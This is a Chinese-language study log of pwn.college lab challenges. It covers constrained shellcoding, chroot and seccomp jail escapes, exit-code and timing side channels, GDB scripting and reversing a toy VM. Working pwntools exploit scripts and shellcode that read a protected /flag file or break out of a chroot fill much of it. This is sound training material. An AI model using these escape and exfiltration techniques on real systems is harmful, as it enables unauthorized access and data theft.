p = process(binary)

p.recvuntil("memory at 0x")
addr = int(p.recvline()[:-2], 16)

# 通过测试程序的打印功能查到read编码0xf字节, 所以不用jmp直接接在后面
shellcode = shellcraft.amd64.read(0, addr+0xf, 0x100)

payload = asm(shellcode)
p.sendline(payload)
p.recv() # 无关紧要

shellcode = shellcraft.amd64.open("/flag")
shellcode+= shellcraft.amd64.read('rax', addr+0x100, 0x100)
shellcode+= shellcraft.amd64.write(1, addr+0x100, 0x100)
payload = asm(shellcode)
p.sendline(payload)

p.interactive()

5.禁用syscall系列

啊这, 我这……. 折腾了半天重新看了看课件终于知道他要考我什么了.

还可以用mov byte ptr [rip + s01], 0x0f这样的来改变shellcode本身. 依据在于将0f05两个字节分开来.

1 2	`mov byte ptr [rip+syscall1], 0x0f mov byte ptr [rip+syscall2], 0x05`

exploit:

import sys
from pwn import * 
from glob import *
context.log_level = 'info'
binary = glob("/challenge/babyshell_level[0-9]")[0]
context.binary = binary    # 例行解决arch问题
p = process(binary)

p.recvuntil("memory at 0x")
addr = int(p.recvline()[:-2], 16)
shellcode = shellcraft.amd64.open("/flag")
shellcode+= shellcraft.amd64.read('rax', addr+0x100, 0x100)
shellcode+= shellcraft.amd64.write(1, addr+0x100, 0x100)

# dec BYTE PTR [rip+1]
# b'\xfe\r\x01\x00\x00\x00'
payload = asm(shellcode)

i = 0
# len = len(payload)
while i<len(payload):
    if payload[i]==0x0f and payload[i+1]==0x05:
        # 发现syscall的0x0f05的时候换成一条dec指令+0x0f06, 注意到opcode已经换成了0x0f06
        # 即CLTS(Clear Task-Switched Flag in CR0)指令.
        # 如果整个0f04不存在的指令也行, 不会引起反汇编出现SIGSEGV
        payload = payload[:i] + b'\xfe\r\x01\x00\x00\x00' + b'\x0f\x06' + payload[i+2:]
        i+=8
    else:
        i+=1

p.sendline(payload)
p.interactive()

6.同上, 限制前0x1000写入权限, 总共可写入0x2000

只要read的buf在后4096字节, 然后payload = payload.rjust(0x1500, b'\x90')即可.

居然栽在rjust这个函数上: 第一次以为rjust直接修改bytes, 但发现是个不可修改的class, 然后发现width是指修改完后的长度而不是直接在左边填充多少fillchar…

7.关闭stdio

照着课件的说法是每次返回1bit都能communicate…….

不过直接打开另外一个文件就行了. 居然栽在open syscall的o_flag上, 应该给个O_WRONLY或者O_RDWR.

shellcraft的open函数能接受int的o_flag或者字符串类型的flag. 只支持大写(这不是当然么, 汇编器只支持这种宏定义).

#打开文件, rax存储fd, 从文件中读取到内存中addr+0x100, 然后写到stdout
shellcode = shellcraft.amd64.open("/flag")
shellcode+= shellcraft.amd64.read('rax', addr+0x200, 0x100)
shellcode+= shellcraft.amd64.open("/home/hacker/res", 1)
shellcode+= shellcraft.amd64.write('rax', addr+0x200, 0x40)

payload = asm(shellcode)

8.限制写权限

而且第一次只有0x12(18)字节的汇编字节可以输入. 后面的字节使用了 mprotect(shellcode_mem, 4096, PROT_READ|PROT_EXEC)来限制再次write.

emmmmmm……….

tips:

In fact these are a lot of bytes. Try different sys calls. There are other ways to read a flag as well

Search for a syscall that takes minimal argument so as to decrease size

syscalls man7

找了半天, 只有个chmod能用, 居然刚好18字节, 真绝啊. 一开始想着读取文件肯定是做不到的, 因为只能写到buffer上, 塞不下更多的逻辑了. 18个字节真的太少, 只能换一个方向而去改变他的权限, 然后就可以任意读取了.

为了尽量节省空间, '/flag'放在了bytes的最后, 由起始地址addr计算出/的位置, 取代s1中9所在位置.

addr = int(p.recvline()[:-2], 16)

s1 = '''
    /* chmod(file='/flag', mode='S_IROTH') */
    mov edi, 9
    mov sil, 0x04 /* S_IROTH == 0x04 */
    /* call chmod() */
    mov al, 0x5a
    syscall
'''
pos = s1.find('9')
s1 = s1[:pos] + hex(addr+12) + s1[pos+1:]
temp = asm(s1)
payload = payload + b'/flag'

不一定要用这种替换, 可以使用lea rdi, [rip+0x??] , 或者下面这个chown系统调用.
1
2
3
4
5
lea rdi, [rip+0xf]
mov si, 0x3e8
mov dx, si
mov al, 92
syscall # chown(const char *pathname, uid_t owner, gid_t group)

13.同上, 而且变成0xc字节, 看来只能chown或者chmod了, 这里用chmod.

?????好吧应该push到栈上, 然后再mov rsp, 这样子才能大幅度地减少字节长度.

而且由于是小端法存储, 自然地就有7个空字符在0x66后面.
gdb一看rax是put函数的返回值, 直接就是0. 这点挺重要: 利用可预测的寄存器的值

push byte ptr 'f'    ;6a 66 
mov rdi, rsp		;48 89 e7
mov sil, 0x04		;40 b6 04
mov al, 0x5a		;b0 5a 
syscall			    ;0f 05 长度为0xb

第二种方案是execv, 去执行shell, 不过文件开头要这么写#!/bin/sh -p, -p是防止默认的重置SUID操作. shell里面直接写cat /flag就成了

9.被动修改

This challenge modified your shellcode by overwriting every other 10 bytes with 0xcc. 0xcc, when interpreted as an
instruction is an INT 3, which is an interrupt to call into the debugger. You must avoid these modifications in your
shellcode.

s1 = '''
    /* chmod(file='/flag', mode='S_IROTH') */
    lea edi, [rip+0x22]
    jmp done
    .space 12
done:
    mov sil, 0x04 /* S_IROTH == 0x04 */
    /* call chmod() */
    mov al, 0x5a
    syscall
    .skip 13
'''
payload = asm(s1) + b'/flag\x00'

10.sort ur shellcode

每8个字节作为一个64位无符号数, 使用冒泡排序升序排列. emmmmmm……

非常刚好的每8字节从小到大排序, 主要的思想就是代码尽量少, 打开文件和读写放到另外一个文件中(c写的读文件), execve会继承父进程权限.

shellcode = '''
    push 0x632f2e
    mov rdi, rsp
    xor edx, edx /* 0 */
    xor esi, esi /* 0 */
    /* call execve() */
    push SYS_execve /* 0x3b */
    pop rax
    syscall
'''
#   0:   68 2e 2f 61 00          push   0x612f2e
#   5:   48 89 e7                mov    rdi, rsp
#   8:   31 d2                   xor    edx, edx
#   a:   31 f6                   xor    esi, esi
#   c:   6a 3b                   push   0x3b
#   e:   58                      pop    rax
#   f:   0f 05                   syscall

11.同上, 关闭stdin

上一题仍然继续用.

12.每个byte得unique

ascii_values = [ord(character) for character in text]python字符串=>ASCII

shellcode = '''
    push 0x632f2e
    mov rdi, rsp
    xor esi, esi /* 0 */
    lea edx, [esi] /* 0 */
    /* call execve() */
    push SYS_execve /* 0x3b */
    pop rax
    syscall
'''

出乎意料的简单, 只要把第二个xor改成lea指令去清空edx就可以了. 一开始改的mov还不行.

14.只读6个字节

好像只能2-stage shellcode, emmmmmmmm…….

仍然是利用了rax等于0, rdx是shellmem地址, 也可以当做是要读取的字节数使用read函数的话只有rsi(第二个参数)需要改为rdx上的地址, 简单mov就可以了. 然后第二阶段随便整.

shellcode = '''
xor edi, edi
mov esi, edx
syscall	//call read(0, 0x14e40000, 0x14e40000)
//2-stage shellcode
.space 6, 0x90
'''
shellcode += shellcraft.amd64.open('/flag')
shellcode += shellcraft.amd64.read('rax', 0x14e40000+0x100, 0x40)
shellcode += shellcraft.amd64.write(1,    0x14e40000+0x100, 0x40)

payload = asm(shellcode)
with open("/home/hacker/input", "wb") as o:
    o.write(payload)

module 5-jail

chroot(“/tmp/jail”)
- chroot(“/tmp/jail”) does NOT:
  
  Close resources that reside outside of the jail.
  cd (chdir()) into the jail.
  Do anything else!
- you can use openat and execveat: int openat(**int dirfd**, char *pathname, int flags);
  
  这两个函数的path如果是绝对路径, 那么dirfd就会被忽略;
  如果path是相对路径, 而且dirfd是合法的, 那么path所引用的就是dirfd所表示的路径.
- 如果再次chroot会发生什么? kernel对此是完全不知情的.
- Generally, a user with an effective ID of 0 (i.e., a process run as root or SUIDed to root) can always break out of a chroot, unless the chroot syscall is blocked!
- Also missing other forms of isolation: PID, network, IPC
- Replacements: cgroups, namespaces, seccomp
seccomp:
- gcc -o test test.c -lseccomp seccomp-tools dump ./test
- 原理是eBPF, seccomp就是使用的eBPF来实现的, 还可以用来实现一系列system trace tools
break out seccomp: Generally, to do anything useful, a sandboxed process needs to be able to communicate with the privileged process. 有两点可能, 第一是syscall很多, 有些可能可以被利用, 第二是开发者可能为了不破坏功能而在权限方面犯错误.
- permissive policies: ptrace() sendmsg() prctl() process_vm_writev()
- syscall confusion: on some systems, you can switch between 32-bit mode with 64-bit mode in the same process, and the syscall numbers are different between architectures. 比如说系统调用分别是int 0x80 and syscall(\xcd\x80 and \x0f\x05), 系统调用号也不同.
- kernel vulnerabilities in the syscall handlers: Over 30 chrome sandbox escapes in 2019 link
- data exfiltration: such as sleep(), exit(), normal or crash. Or use DNS queries to bypass network egress filters.

Redirections很重要. link

补充:

实际测试中在shell里面直接使用chroot命令并不会发生escape, 只能在c代码中使用chroot库函数. 猜测可能是因为chroot的命令行对系统调用进行了一层封装, 加上了跳转到jail里面的目录中; 而libc库中只是单纯的系统调用, 并没有chdir这个步骤.
好几个函数都有at的版本, chmod->fchmodat, open->openat(open只是libc中对openat的封装) and so forth.

1.exemplify

相当简单, 直接利用程序中chroot后没有切换到jail里面的特点, 更改cwd为真正的根目录, 第一个参数填写为flag, 最后open的时候由于flag是相对地址, 会以真正的根目录作为基准来定位true flag.

2.同第一题

第一个参数不能含有flag字符串, 是为了禁止直接打开flag文件. 在这个challenge中还可以注入shellcode,

也没什么难的, 只要在shellcode里面打开‘flag’然后写到stdin里面就可以了.

import sys
from pwn import *
from glob import *
context.log_level = 'info'
binary = glob("/challenge/baby*[0-9]")[0]
context.binary = binary
p = process([binary, b'abc']) #不能直接打开flag文件

shellcode = shellcraft.amd64.open('flag', 'O_RDWR')
shellcode+= 'lea r8, [rip]\nadd r8, 0x100'	#写到buf上, 估计很快就不行了.
shellcode+= shellcraft.amd64.read('rax', 'r8', 0x100)
shellcode+= shellcraft.amd64.write(1, 'r8', 0x40)

payload = asm(shellcode)
payload += b'\x0f\x04'	# 随手加个非法指令,遇到SIGILL就知道shellcode肯定是执行完了.
p.sendline(payload)

p.interactive()

3.move in

参数不能含有flag子串, 打开文件时有O_NOFOLLOW标志, 软连接无效, 而且在chdir之前只有一个open.
也不能在命令行里打开flag, 包括符号链接. 要跳出chroot也许只剩下再次chroot. 好像也不行, 看了看视频应该要用openat.
在kali上试试chroot. openat成功了.

directory stream file descriptor和file descriptor不是同一个东西, 具体资料待查. openat只能用dirfd.
命令行里打出./chroot flag 6<.即可, 会打开当前文件夹且dirfd=6.
也可以直接打开fd=3, 这个是命令行第一个参数, 而且在chroot前被打开, 可以被openat使用.

import os
from pwn import *
from glob import *
context.log_level = 'info'
binary = "/challenge/"+os.uname().nodename
context.binary = binary

shellcode = shellcraft.amd64.openat(6, "flag", "O_RDWR") 
shellcode += shellcraft.amd64.sendfile(1, 'rax', 0, 100) 

with open('/home/hacker/input', 'wb') as o:
    o.write(payload)

4.seccomped -> openat

每一题的要求都在逐渐增加. 这一题仍然可以用openat, 没有变化.

5. linkat

1
2
3

shellcode = shellcraft.amd64.linkat(6, "flag", "AT_FDCWD", '/f', 0)
shellcode+= shellcraft.amd64.open("f", "O_RDWR")
shellcode+= shellcraft.amd64.sendfile(1, "rax", 0, 128)

6.fchdir

1
2
3

shellcode = shellcraft.amd64.fchdir(6)                       
shellcode+= shellcraft.amd64.open("flag", "O_RDWR")
shellcode+= shellcraft.amd64.sendfile(1, "rax", 0, 128)

7.没有at了

允许的syscall:

chdir (number 80).
chroot (number 161).
mkdir (number 83).
open (number 2).
read (number 0).
write (number 1).
sendfile (number 40).

使用再次chroot:

shellcode = shellcraft.amd64.mkdir("/temp", 0o777)
shellcode+= shellcraft.amd64.chroot("/temp")             
shellcode+= shellcraft.amd64.open("../../flag", "O_RDWR")
shellcode+= shellcraft.amd64.sendfile(1, "rax", 0, 128)

8.openat read write send

感觉没什么特别的. 参数已经不限制输入flag了. 直接使用第三题的东西.

9.变成32位

syscall no: 3,4,5,6: close, stat, fstat, lstat. ???????????

哦对, 程序里的seccomp是通过SCMP_SYS() macro来add rule的, 然后又把arch设置成x86_32, 这样的话就是32位的read write open close这四个系统调用了. 而且没有chroot.

尝试使用pwntools遇到各种各样的问题.

64和32代码是怎么切换的? int 0x80 and syscall吗? 是的, 22年10月知道了.
int 0x80在64位模式下汇编, push最多DWORD. 不然operand mismatch.
字符串的地址只能使用汇编中的label, 栈上的地址仍然是64位的, 可能是因为过长导致open不能使用.
64位汇编肯定就不能用SYS_read这种了, 只能改成数字.

精简如下(也没多精简):

/* open(file='/flag', oflag='O_RDWR', mode=0) */
/* push b'/flag\x00' */
lea ebx, [rip+flag]
mov ecx, 0x2
xor edx, edx
/* call open() */
mov eax, 5
int 0x80
/* read(fd='eax', buf=0x1337100, nbytes=0x99) */
mov ebx, eax
mov ecx, 0x1337100
mov rdx, 0x99
/* call read() */                               
push 3	/* 3 */
pop rax
int 0x80
/* write(fd=1, buf=0x1337100, n=0x32) */
mov ebx, 0x1
mov ecx, 0x1337100
mov rdx, 0x99
/* call write() */
mov eax, 4
int 0x80

flag:
    .ascii "/flag"
    .byte 0 #加不加没有区别, map上去的地址空间都是零

10.side channel communication

都没有chroot了. 这题使用exit每次返回一字节.

import os
from pwn import *
from glob import *
context.log_level = 'info'
binary = "/challenge/babyjail_level10"
context.binary = binary

ans = ""
for i in range(60):
    shellcode =  'mov r8, rdx\nmov r9, r8\nadd r8, 0x100'
    shellcode += shellcraft.amd64.read(3, 'r8', 0x100)
    shellcode += 'mov r10, [r8+'+hex(i)+']\n'
    shellcode += shellcraft.amd64.exit('r10')
    payload = asm(shellcode)
    p = process([binary, '/flag'])
    p.sendline(payload)
    exitCode = p.poll(1)
    ans += chr(exitCode)
    i += 1

print(ans)

11.nanosleep

这下子真的是bitwise的收集数据了

遇到的几个问题:

偶然会发生broken tube, 不知原因.
可以用字符串的format函数.
在pwn.college机子上timespec结构体两个成员都是八字节(包括long)
被网上抄来的32位程序nasm坑了一把, 现在是64位gas, 基本全改了……….
setnz是思维导图里看到突然想起来能用的. 以前整得笔记还不错.
直接使用label地址会有重定位条目, 必须使用rip来加上标签的偏移来在运行时确定准确的地址.
加载地址请用lea……line 15卡了十几分钟…..
视频中演示了time命令, 计算程序运行时间.
也可以直接写在栈上, 不用在汇编里写上这么一个数据结构.
如果把时间范围调大一点也能用时间来表示ascii码值, 也就是一次一字节. 应该更快.
视频使用了一个pwn.log.progress和process参数level, 这样子就不会有一堆打开关闭命令了.

#!/bin/python
import os
import time
from pwn import *
context.log_level = 'info'
binary = "/challenge/"+os.uname().nodename
context.binary = binary

bck1 = 'mov r8, rdx\nmov r9, r8\nadd r8, 0x100\n'+shellcraft.amd64.read(3, 'r8', 0x100)+'xor rcx, rcx\n'
bck2 = '''
    setnz cl
    sal ecx, 4
    mov [rip+tv_usec+3], cl
    mov rax, 35
    lea rdi, [rip+timeval]
    mov rsi, 0
    syscall
    //经典非法指令,至少让我知道shellcode执行正常
    .ascii "\x0f\x04" 
    timeval:
    tv_sec:  .8byte 0
    tv_usec: .8byte 0
'''

ans = ''
for i in range(60):
    char = 0
    for j in range(8):
        sc = bck1 #这个就是对read的一个封装
        #下面这个是取出一字节, 然后测试第j位是否为1
        sc += 'mov cl, [r8+'+hex(i)+']\ntest cl,'+hex(1<<j)+'\n'
        sc += bck2	
#上面这个是nanosleep的调用封装,秒数由j位移位赋值到timespec结构体中第二个成员的第四个字节
#(从最低位开始, 因为是小端法存储),结果是268,435,456(1 0000|00000000|00000000|00000000)ns
#无sleep大概是0.05s,所以分界点为0.2s
        payload = asm(sc)
        start = time.time()
        p = process([binary, '/flag'])
        p.sendline(payload)
        p.wait()
        end = time.time()
        elapse = end - start
        if elapse > 0.2:
            char |= 1<<j
    #end for bits loop
    ans += chr(char)

print(ans)

12.only read

这次换成crash code就行了. -4 is SIGILL, -11 is SIGSEGV

#一点小改动
bck2 = '''
jnz isZero
.ascii "\x0f\x04"
isZero: .byte 0
'''

if p.poll(1) == -4:
    char |= mask

13.怎么是socket??

use socketpair to the local communication

感觉没有任何限制啊, 就是构造一点父子进程间特有的命令.

开始gdb refresher!!!!!

module 6-gdb

GDB时间!

info有好多东西. 看到一个i proc m(appings), 不就是我上次用的! cat /proc/pid/maps么.
一份超好看的cheatsheet!
pwndbg的features
神奇的教程网站, 视频是文字. link
三种gdb插件–gef(demo网站|doc), 其他两个装好了. 还是peda安装简单, 还能整到pwncollege上. 再用一个插件我会混的….

“Auto-loading safe path” section in the GDB manual.

前几题都没什么特别的, 就是一个refresher.

命令行选项: /challenge/e* -x gdbscrip -q

level4

居然要重复四次, 直接修改推导变量. 而且没有运行前加上断点会出错….原因待查.

level5

开始编写gdb脚本. 没有尝试过的东西, 马上开学.

查看gdb manual, 5.1.7 Breakpoint Command Lists有提到一种特别的写法:

1
2
3

commands [list...]
... command-list ...
end

Any other command after a command that resumes execution will be ignored.

Can use silent to disable the printing of usual message when stopping at certain breakpoint. Usefull command for contolled output in 23.1.4 Commands for Controlled Output, usually echo, output, and printf

You can also use breakpoint commands to compensate for one bug and test the other!

e.g.

break foo if x>0
commands
silent
printf "x is %d\n",x
cont
end

好家伙, 每次地址都会变, 得换成相对地址. printf *($rbp-0x18)直接失败, 报attemp to dereferecing a generic pointer. 要想dereference指针得确定指针的类型,

先设断点然后再c(ontinue).

r                           
b *main+709
commands
    silent
    x/gx $rbp-0x18
    set *(int*)($rbp-0x1c)=7
    c
end
c

真正自己写起来问题怎么这么多……

level6

全自动scrip. 在手册中的23.1.3 Command Files有介绍一些flow control command. 然后5.1.3 Setting Catchpoints也挺重要.
This time, try to write a script that doesn’t require you to ever talk to the program, and instead automatically solves each challenge by correctly modifying registers / memory.
GDB: Printing Variables to File, 不太好用, 毕竟是logging文件.
使用printf命令来写raw bytes到文件中.
commands命令可以为断点添加命令.
ddb – interactive kernel debugger

如果要全自动, 我想到的思路是在read /dev/urandom的时候改成从stdin获取, 然后再gdb中使用r < tmp来重定向. 后面的scanf也是从stdin获取, 这样的话就好办了. 为了测试conditionally perform gdb commands, 就不更改循环变量了.

历经挫折:

~~把文件作为输入而且要多次输入, 每次文件指针都会向后移动的…..所以还是改变内存吧……~~事实证明没有问题, 不过如果只是简单地>=3会导致flag无法打开. 所以加上4<tmp, if条件换成if $rdi >= 3 && $rdi != 0x44即可.
这个程序每次都会重新打开/dev/uramdom, 或许是因为新的随机数要重新打开???这样文件指针会大于等于3……
catch syscall会在syscall之前和之后调用, 所以设置好if语句就行…. (calls to and returns from system calls will be caught.)
还把==写成=, 绝
还发现了一个, 第六行按理来说已经跳到别的函数了, 毕竟read也只是glibc的封装, 但没注意到的是__GI___libc_read()这个函数根本没有push rbp, 所以当前栈帧没有变化.

r <tmp
catch syscall read
commands
    silent
    if($rdi >= 3 && $rdi != 0x44)
        set *(int64_t*)($rbp-0x18) = 0x010203 # set ptr type
    end
    c
end

b *main+630 # stop at scanf()
commands
    silent
    set *(int64_t*)($rbp-0x10) = 0x010203
    c
end
c

一个level能挣这么多东西出来…….

level 7

直接一个call (void*)win()就结束了….

module 7-rev

forword engineering vs. reverse engineering
cpp du strip strings commands.
the most often we do is reversing the main modules.
fomit-frame-pointer
cloud ninja 用这个或者直接IDA就行. 都有IDA pro了其他的就随便试试.反正视频里是不可能说用盗版的:laughing:
把另一个checksec链接成了secheck, 功能似乎更多一点.
Open source:
- angr management: an academic binary analysis framework! (github)
- ghidra: a reversing tool created by the National Security Agency (https://ghidra-sre.org/)
- cutter: a reversing tool created by the radare2 open source project (https://cutter.re/)
dynamic analysis:
- ltrace and strace
- gdb
  - context可以直接用display命令在每次停下来的时候模拟.
- Timeless Debugging
  - gdb has built-in record-replay functionality (doc)
  - rr is a highly-performant record-replay engine (github) doc
  - qira is a timeless debugger made for reverse engineering (https://qira.me/)

level1.0-2.1

没有什么特别, 但是2.1这个字符换位置的汇编值得注意:

movzx   eax, byte ptr [rbp+buf]
mov     byte ptr [rbp+var_10], al
movzx   eax, byte ptr [rbp+buf+1]
mov     byte ptr [rbp+var_10+1], al
movzx   eax, byte ptr [rbp+var_10+1]
mov     byte ptr [rbp+buf], al
movzx   eax, byte ptr [rbp+var_10]
mov     byte ptr [rbp+buf+1], al

level3

合着每关还有提示这关用了什么……

level3是reverse mangler.

level4

IDA的汇编语法是使用的MASM(Microsoft Macro Assembler)的. 这里是一些directive.
IDA使用的high-level IL是IDC, 一个C-like language. 像什么LOBYTE在手册中有
一个char buf[6]被识别成了int buf + int16_t v6, 改一下buf的定义就成.
看了看IDA的一些操作.

由于biltw是按照字母顺序排列, 所以一通操作之后没有变化.

level5

This challenge is now mangling your input using the xor mangler with key 0xb2

list = [0xFA,0xF6,0xEA,0xF5,0xF1]
print([chr(x^0x98) for x in list])

['b', 'n', 'r', 'm', 'i']

好像简单过头了…

level6

reverse + sort + xor

str = "8f 8e 8e 8e 8c 82 81 87 86 84 9f 9e 9e 9e 93"
list = str.split(" ")
list1 = [chr(int(x,16)^0xeb) for x in list]
list1.reverse()
res = "".join([x for x in list1])
print(res)

属于是python的练习使用

level7

真特么复杂….还有不可见字符只能整成byte写到文件里.

好像挺简单, 但是又有点难(?

#!/usr/bin/env python

str = "ff ff fe fc fb fb fb f7 f6 f6 f1 e7 e6 e1 e1 3c 3a 3a 38 37 32 32 20 2c 25 22 21 32 20"
list = str.split(" ")
list[22], list[27] = list[27], list[22]
list.reverse()
print(list)
#print(len(list))
list = [int(x,16) for x in list]
for i in range(0,27,2):
    list[i] ^= 0x95
    list[i+1] ^= 0x56
list[28] ^= 0x95 #奇数个.....
list.reverse()
print(list)


byte = b''.join([x.to_bytes(1,'big') for x in list]) #什么需求直接谷歌比看文档快多了, 特别是这种简单语法......
print(byte)

with open("/root/Desktop/input", "wb") as o:
    o.write(byte)

level8

这合理吗? 就硬堆数量……

level9

噢, 有点东西, 完全看不出来发生了什么, 得反汇编看看.

用的md5, 没有办法reverse, 但是可以修改代码内容.

IDA 添加类型在shift+f1的local types中添加. 也就是view中的open subviews. ctrl+1=quick view
gdb 与 set-uid 程序与 $base
IDA number of operand.

因为使用了mprotect()可以修改代码段, 所以直接找到jnz的地方改成jz. 也就是0x1f01处从75改成74.

level10

使用bin_pedding函数把main函数填充到了2xxx的相对地址处, 不过同上.

level11

IDA的rename选项在手册的Give Name to the Location章, 查了下LOCAL and PUBLIC伪指令

我还得查下md5函数怎么用.

直接把整个程序的每个部分进行一个hash, 所以修改其他地方无法通过验证. 而且只能修改2byte.

没事了, 连着改两个jnz就行了.

level12

开始Yan85

LOAD segment 只是个没有名字的段, IDA默认整个名字上去. 可以在段介绍中看到pure data/code之类的.
递归学习:
- 在IDA看到一个text "UTF-16LE", 'abcdsif', 还以为七个字符是连在一起的. 结果发现UTF-16LE有特别的地方. 直接改成DATA就会出现\0间隔的字符.
- 然后就去查16LE是什么. 其实就是UTF-16的little-endian版本. Byte-Order-Mark etc.
- UTF-8优势在于ascii是1byte, 16优势在于非ascii是两字节, 32在于不用encoding and decoding.

# memset的一种实现方法, store string from rax by addr in rdi and counter in rcx.
lea	rdx，[rbp+var_110]
mov	eax， 0
mov	ecx，20h ;
mov rdi,rdx
rep stosq

Yan85: a1, a2, a3是arg no.

在main函数中一个256字节的空间(char a1[256+7]), 后面跟着7byte用作七个寄存器的空间. 然后进入execute_program.
describe_register是将数字转换成一个字符, 总共有七个, 每个字符后面都有\0: aNone db 'NONE',0
describe_* 后面的level可能会用到, 到时再说
write_register是将a2用作a1[256~262]的索引, 然后将a3写入数组中.

寄存器 r1 r2 r3 r4 r5 r6 r7

**分别是 8 4 64 32 16 2 1 **
write_memory被用在stm指令中

然后分析每个指令作用: (reg)表示标号对应的寄存器的值.

imm 就是 (reg)a2 = a3 加载立即数.
stm其实就是mov [(reg)a2 + a1], a3
syscall(a1, a2, a3), 假设寄存器为r1 r2 ~ r6, 然后if a2 == …
- 8: open fd = open(&a1[r1], r2, r3); (reg)a3 = fd;
- 4: read v5 = r3+r2>=256 ? -r2 : r3; count = read(r1, &a1[r2], v5) 然后count写入reg a3
- 1: write v5 = r3+r2>=256 ? -r2 : r3; count = write(r1, &a1[r2], v5) 然后count写入reg a3
- 16: sleep r1 secs, (reg)a3 = left_time
- 0x20: exit(r1)
- else: exit( (reg)a3 )

如果是12.1, 估计我写个gdb脚本会更方便我查看执行流程. 在每个函数入口处dumpargs, 然后打印出来. 12.0我就直接看看提示.

woc, 12.1都没有函数名称的, 我还得重命名一下函数.

看了前面的一点, 只要printf "\x94\x11\x3f\xb3" > input 就行. 自动读取flag.

level13

ldm: load from memory: (reg)a2 = a1[(reg)a3]
cmp: 两个寄存器结果放在a1[262]里, 第五位作为标志位,
1
2
3
4
5
小于 : 16  	第5位
大于 : 8		第4位
等于 : 4 		第3位
不等于: 2      第2位
两个全为零:1   第1位
寄存器 r1 r2 r3 r4 r5 r6 r7
**分别是 16 64 1 4 8 32 2 **

看视频看到了新方法.

遇到了一个指令解析错误, 只能undefinecrash函数, 然后把字节设置成指令设置函数end 设置新函数.
完全可以只用静态分析, 既然256字节空间之后跟着的是7个register, 那么可以定义一个结构体, 这样decompilerd result会更准确.

struct state
{
  char memory[256];
  unsigned __int8 r1;
  unsigned __int8 r2;
  unsigned __int8 r3;
  unsigned __int8 r4;
  unsigned __int8 r5;
  unsigned __int8 r6;
  unsigned __int8 r7;
};

对于describe_register()函数来说可以定义一个enum变量, 就不用搁那翻译每个寄存器是对应哪个数字了.

enum REGISTER : __int8
{
  r1 = 0x1,
  r3 = 0x2,
  r7 = 0x4,
  r4 = 0x8,
  r2 = 0x10,
  r6 = 0x20,
  r5 = 0x40,
};

level14.1

emmmmm好像也没什么意义, 纯粹花时间看懂一个流程罢了. 只是复杂度的简单叠加, 把输入的每个bit进行一个加法操作.

这题是0x81位置上先放九个数, 然后再分别加上一个数字, 然后, 就那样..

level15

还是加上一个数, 勉强做一下. 果然是浪费时间.

level16.1

开始Yan85 byte code. 直接从没有符号的版本入手开始占卜(

~~IDA反编译出了问题, 实在是逆转前三个字节顺序的汇编代码太神奇, 一堆符号拓展零拓展什么的.~~ 然后发现并没有问题.

发现指令编码是这样一个结构:

struct inst
{
  __int8 oprnd_1;
  __int8 opcode;
  __int8 oprnd_2;
  __int8 pedding; //useless
};

在IDA中使用IDC编写脚本(gdb script也行, 也可以设置临时变量之类的).

ADD

auto reg1 = SIL;
auto reg2 = (ESI & 0xff0000) >> 16;
auto s1; auto s2;

if(reg1==1) s1 = "r1";
else if(reg1==16) s1 = "r2";
else if(reg1==4) s1 = "r3";
else if(reg1==64) s1 = "r4";
else if(reg1==32) s1 = "r5";
else if(reg1==8) s1 = "r6";
else if(reg1==2) s1 = "r7";

if(reg2==1) s2 = "r1";
else if(reg2==16) s2 = "r2";
else if(reg2==4) s2 = "r3";
else if(reg2==64) s2 = "r4";
else if(reg2==32) s2 = "r5";
else if(reg2==8) s2 = "r6";
else if(reg2==2) s2 = "r7";

msg("\tADD: %s = %s + %s\n", s1, s1, s2);

return 0;

POP:

auto reg1 = (get_wide_dword(RBP-0x10) & 0xff);
auto s1;

//省略判断寄存器名称的部分代码

msg("\tPOP: %s=0x%x is %c, rsp=0x%x\n", s1, RDX, RDX, RSI-1);
return 0;

STM:

auto reg1 = get_wide_byte(RBP-0x20) & 0xff;
auto reg2 = (get_wide_dword(RBP-0x20) & 0xff0000) >> 16;
auto s1; auto s2;

//省略判断寄存器名称的部分代码

msg("\tSTM: *%s = %s\n", s1, s2);
return 0;

LDM:

auto reg1 = get_wide_byte(RBP-0x10) & 0xff;
auto reg2 = (get_wide_dword(RBP-0x10) & 0xff0000) >> 16;
auto s1; auto s2;

//省略判断寄存器名称的部分代码

auto mem = AL;
msg("\tLDM: %s = *(%s); mem:0x%x\n", s1, s2, mem);
return 0;

CMP:

auto reg1 = get_wide_byte(RBP-0x20) & 0xff;
auto reg2 = (get_wide_dword(RBP-0x20) & 0xff0000) >> 16;
auto s1; auto s2;

//省略判断寄存器名称的部分代码

auto r1=get_wide_byte(RBP-0x2);
auto r2=get_wide_byte(RBP-0x1);
msg("\tCMP: %s:%s 0x%x:0x%x\n", s1, s2, r1, r2);
return 0;

print all regs:

auto r1=get_wide_byte(RDI+1024);
auto r2=get_wide_byte(RDI+1025);
auto r3=get_wide_byte(RDI+1026);
auto r4=get_wide_byte(RDI+1027);
auto r5=get_wide_byte(RDI+1028);
auto r6=get_wide_byte(RDI+1029);
auto r7=get_wide_byte(RDI+1030);

msg("\t    [V] r1:0x%x r2:0x%x r3:0x%x r4:0x%x r5:0x%x r6:0x%x r7:0x%x\n", r1,r2,r3,r4,r5,r6,r7);

return 0;

设置完之后就会出现非常漂亮的一个输出, 不过很长, 而且这种输出是会跟着程序流变化的, 不利于整体上的静态分析. 下次尝试避开所有跳转, 按顺序打印出所有的代码, 不然跳来跳去的真的很难看.

结果就是简单的判断字符串相等, 总共9字节. 都在log文件里.

level17

if(reg1==2) s1 = "r1";
else if(reg1==32) s1 = "r2";
else if(reg1==16) s1 = "r3";
else if(reg1==1) s1 = "r4";
else if(reg1==4) s1 = "r5";
else if(reg1==64) s1 = "r6";
else if(reg1==8) s1 = "r7";

if(reg2==2) s1 = "r1";
else if(reg2==32) s2 = "r2";
else if(reg2==16) s2 = "r3";
else if(reg2==1) s2 = "r4";
else if(reg2==4) s2 = "r5";
else if(reg2==64) s2 = "r6";
else if(reg2==8) s2 = "r7";

先跳过, 感觉就是复杂度的堆积, 又或者是我方向错了. 到时回来看.

level18

Yan85 shellcoding. 直接做.0题目, 省点事.

输入0x300uLL字节的bytecode, 前768字节是指令最多256条, 后面是内存空间, 再后面是寄存器.

完全由我控制的话首先是往内存中放入/flag字符串, 然后open(path in memory) -> read to memory -> write to stdout. 再结合一下题目里的寄存器, 操作数和顺序就行. 估计得写个python函数自动生成.

level19

更特别了. 主要是这个rerandomize()函数, 其中寄存器, 指令, 系统调用, cmp标志位全部都是随机的. 随机的方法是8个int8随机选取两个进行交换, 执行65535次.

难道是在变化中找到不变的东西?

